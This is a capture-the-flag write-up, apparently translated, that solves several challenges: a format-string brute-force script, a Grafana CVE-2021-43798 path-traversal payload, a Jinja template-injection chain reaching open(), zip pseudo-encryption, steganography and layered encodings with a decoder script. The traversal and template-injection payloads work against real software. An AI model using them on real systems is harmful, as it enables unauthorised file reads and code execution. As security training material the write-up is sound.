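I got the third-prize money. I'm not competing this semester; there is too much homework.
Analysis shows that the flag is stored at the address that buf points to!
Brute-force the format-string argument index directly: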
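```python
from pwn import *

n = 1
while True:
    try:
        p = remote("118.195.147.196", 9238)
        # Ask printf to treat the n-th argument as a string pointer.
        p.sendline(f"%{n}$s".encode())
        print(n)
        d = p.recv()
        p.close()
        if b'flag' in d:
            print(n, d)
            break
        print(d)
    except Exception:
        # An invalid pointer drops the connection; move on to the next index.
        pass
    n = n + 1
```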
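I got it by pressing keys at random; the video is the proof, and it is included in the archive.
A Baidu search turned up CVE-2021-43798.
payload: /public/plugins/welcome/../../../../../../../../home/grafana/flag
I sent it with HackBar first, but the front end seems to process the URL and strips the …/, so I sent the request with Burp Suite instead.
The front end appears to process the response, so no output is visible; use Burp Suite.
Passing in {{self}} returns the template data.
Then the usual self.__class__.__base__.__subclasses__()
To inspect the initializer of the type class, pass in {{self.__class__.__base__.__subclasses__()[0].__init__}}
After that it is the usual payload: run ls, and once the file name is known, read the file directly.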
?name={{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('flllll11111114aaaaaggggggggggggg').read()}}
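Reference article
I captured the traffic and found that pick produces no request; it is front-end JS code, so I read the code. The JS contains the hint jiami.v5. I could not undo the JS obfuscation, so I read the JS as it was and found a path.
Visiting it shows nothing; capture the request, and the flag is in the response.
Pseudo-encryption: change 09 to 00.
White strips are visible along the top and left edges of the image, so it is probably LSB.
Viewing it in StegSolve yields a QR code.
Scanning the code gives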
4a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f5752594f56465751334b55474a345841324b494b4a3546495533594b524a4449524b454b35435753334c324f4a41564153534f48424756515243574d355a464d3543474a593d3d3d3d3d3d
Hex to string
JZJXG2TGHBFXQVTQOF4WQ5CTGVJGIVJSGF4UYWTVOFLDOWRYOVFWQ3KUGJ4XA2KIKJ5FIU3YKRJDIRKEK5CWS3L2OJAVASSOHBGVQRCWM5ZFM5CGJY======
base32
NSsjf8KxVpqyhtS5RdU21yLZuqV7Z8uKhmT2ypiHRzTSxTR4EDWEimzrAPJN8MXDVgrVtFN
base58
YXN1cml7aV90aGlua190aGF0X2lzX3NvX2Vhc3lfZm9yX3lvdX0=
base64
asuri{i_think_that_is_so_easy_for_you}
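The hex, base32, base58, base64 chain above can be peeled automatically. The following is an added example, not part of the original write-up: `peel`, `b58decode` and `LAYERS` are names chosen here, the Bitcoin Base58 alphabet is an assumption, and the detection is a heuristic that tries the narrowest alphabet first.

```python
import base64
import re

# Assumption: the Base58 layer uses the Bitcoin alphabet.
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Hex string obtained from the QR code, copied from this page.
PAGE_SAMPLE = "4a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f5752594f56465751334b55474a345841324b494b4a3546495533594b524a4449524b454b35435753334c324f4a41564153534f48424756515243574d355a464d3543474a593d3d3d3d3d3d"

def b58decode(s: str) -> bytes:
    """Base58: read the text as a big-endian base-58 integer."""
    n = 0
    for ch in s:
        n = n * 58 + B58.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    zeros = len(s) - len(s.lstrip("1"))  # each leading '1' is one zero byte
    return b"\x00" * zeros + body

# Narrowest alphabet first: a hex string is also valid Base64, so order matters.
LAYERS = [
    ("hex", re.compile(r"(?:[0-9a-fA-F]{2})+"), bytes.fromhex),
    ("base32", re.compile(r"[A-Z2-7]+=*"), base64.b32decode),
    ("base58", re.compile("[" + B58 + "]+"), b58decode),
    ("base64", re.compile(r"[A-Za-z0-9+/]+={0,2}"),
     lambda s: base64.b64decode(s, validate=True)),
]

def peel(text: str, max_depth: int = 10):
    """Strip encoding layers; return [(encoding, decoded_text), ...]."""
    steps = []
    for _ in range(max_depth):
        for name, pattern, decode in LAYERS:
            if not pattern.fullmatch(text):
                continue
            try:
                out = decode(text).decode("ascii")
            except ValueError:  # bad padding, bad digit, or non-ASCII result
                continue
            if out.isprintable():
                text = out
                steps.append((name, out))
                break
        else:
            break  # no layer decoded cleanly: treat the text as plaintext
    return steps

if __name__ == "__main__":
    for name, value in peel(PAGE_SAMPLE):
        print(f"{name:>6} -> {value}")
```

Peeling stops at the flag because `{` and `_` fall outside every alphabet; a short plaintext made only of letters and digits would be over-decoded, so check the last step by eye.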
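Extracting the archive gives a key.wav file, which should be the key.
Viewing the spectrogram in Audacity gives the key MudaMudaMudaMuda.
Running strings on the image shows a string at the end of the file: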
RjAgOUYgOTkgODMgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEUgQTQgRjAgOUYgOUEgQUEgRjAgOUYgOEMgOEYgRjAgOUYgOTAgOEUgRjAgOUYgQTUgOEIgRjAgOUYgOUEgQUIgRjAgOUYgOTggODYgRTIgOUMgODUgRjAgOUYgOTggODAgRjAgOUYgQTQgQTMgRTIgOEMgQTggRjAgOUYgOTAgOEQgRTIgOTggODAgRjAgOUYgQTUgOEIgRjAgOUYgOTggODYgRjAgOUYgOTkgODMgRjAgOUYgOEUgODMgRjAgOUYgOTAgOTggRjAgOUYgOEQgOEQgRTIgOTggODIgRjAgOUYgOUEgQUEgRjAgOUYgOEMgQUEgRjAgOUYgOTIgQjUgRjAgOUYgOUEgQTggRTIgOEMgQTggRjAgOUYgOTggODEgRjAgOUYgOTQgQUEgRTIgOUMgOTYgRjAgOUYgOEUgODggRjAgOUYgOEMgOEYgRjAgOUYgOTQgODQgRjAgOUYgOTYgOTAgRjAgOUYgQTYgOTMgRjAgOUYgOEMgOEYgRjAgOUYgOTUgQjkgRjAgOUYgOTggOEQgRjAgOUYgOTEgOEMgRjAgOUYgOEMgODkgRjAgOUYgOTIgQjUgRjAgOUYgOEYgOEUgRjAgOUYgOUEgQUIgRjAgOUYgQTQgQTMgRjAgOUYgOTYgOTAgRjAgOUYgOTIgQTcgRjAgOUYgOEQgOEQgRjAgOUYgOEMgQkYgRjAgOUYgOTggOEQgRjAgOUYgOEQgOEUgRjAgOUYgOUEgQTggRjAgOUYgOTAgOEUgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEYgQjkgRjAgOUYgOEUgODUgRjAgOUYgOTkgODMgRjAgOUYgOTEgOTEgRjAgOUYgOTggODYgRTIgOTggODMgRjAgOUYgOTAgODUgRjAgOUYgOTUgQjkgRjAgOUYgOTggODcgRjAgOUYgOEYgQjkgRjAgOUYgOEYgQjkgRjAgOUYgOEQgQjUgRjAgOUYgOEUgODggRjAgOUYgOEQgOEUgRjAgOUYgQTQgQTMgRjAgOUYgOTggODEgRjAgOUYgOEQgOEQgRjAgOUYgOUEgQTggRjAgOUYgOEYgQjkgRjAgOUYgOTEgQTMgRjAgOUYgOTQgODQgRjAgOUYgQTQgQTMgRjAgOUYgOEUgODggRjAgOUYgOTggODIgRjAgOUYgOTAgOEQgRTIgOUMgODUgRjAgOUYgOTggODAgIEUyIDlDIDg1IEYwIDlGIDlBIEFBIEYwIDlGIDk4IDhFIEYwIDlGIDk4IDgwIEYwIDlGIDk3IDkyIEYwIDlGIDk3IDkyCg==
base64
F0 9F 99 83 F0 9F 92 B5 F0 9F 8C BF F0 9F 8E A4 F0 9F 9A AA F0 9F 8C 8F F0 9F 90 8E F0 9F A5 8B F0 9F 9A AB F0 9F 98 86 E2 9C 85 F0 9F 98 80 F0 9F A4 A3 E2 8C A8 F0 9F 90 8D E2 98 80 F0 9F A5 8B F0 9F 98 86 F0 9F 99 83 F0 9F 8E 83 F0 9F 90 98 F0 9F 8D 8D E2 98 82 F0 9F 9A AA F0 9F 8C AA F0 9F 92 B5 F0 9F 9A A8 E2 8C A8 F0 9F 98 81 F0 9F 94 AA E2 9C 96 F0 9F 8E 88 F0 9F 8C 8F F0 9F 94 84 F0 9F 96 90 F0 9F A6 93 F0 9F 8C 8F F0 9F 95 B9 F0 9F 98 8D F0 9F 91 8C F0 9F 8C 89 F0 9F 92 B5 F0 9F 8F 8E F0 9F 9A AB F0 9F A4 A3 F0 9F 96 90 F0 9F 92 A7 F0 9F 8D 8D F0 9F 8C BF F0 9F 98 8D F0 9F 8D 8E F0 9F 9A A8 F0 9F 90 8E F0 9F 92 B5 F0 9F 8C BF F0 9F 8F B9 F0 9F 8E 85 F0 9F 99 83 F0 9F 91 91 F0 9F 98 86 E2 98 83 F0 9F 90 85 F0 9F 95 B9 F0 9F 98 87 F0 9F 8F B9 F0 9F 8F B9 F0 9F 8D B5 F0 9F 8E 88 F0 9F 8D 8E F0 9F A4 A3 F0 9F 98 81 F0 9F 8D 8D F0 9F 9A A8 F0 9F 8F B9 F0 9F 91 A3 F0 9F 94 84 F0 9F A4 A3 F0 9F 8E 88 F0 9F 98 82 F0 9F 90 8D E2 9C 85 F0 9F 98 80 E2 9C 85 F0 9F 9A AA F0 9F 98 8E F0 9F 98 80 F0 9F 97 92 F0 9F 97 92
Hex to characters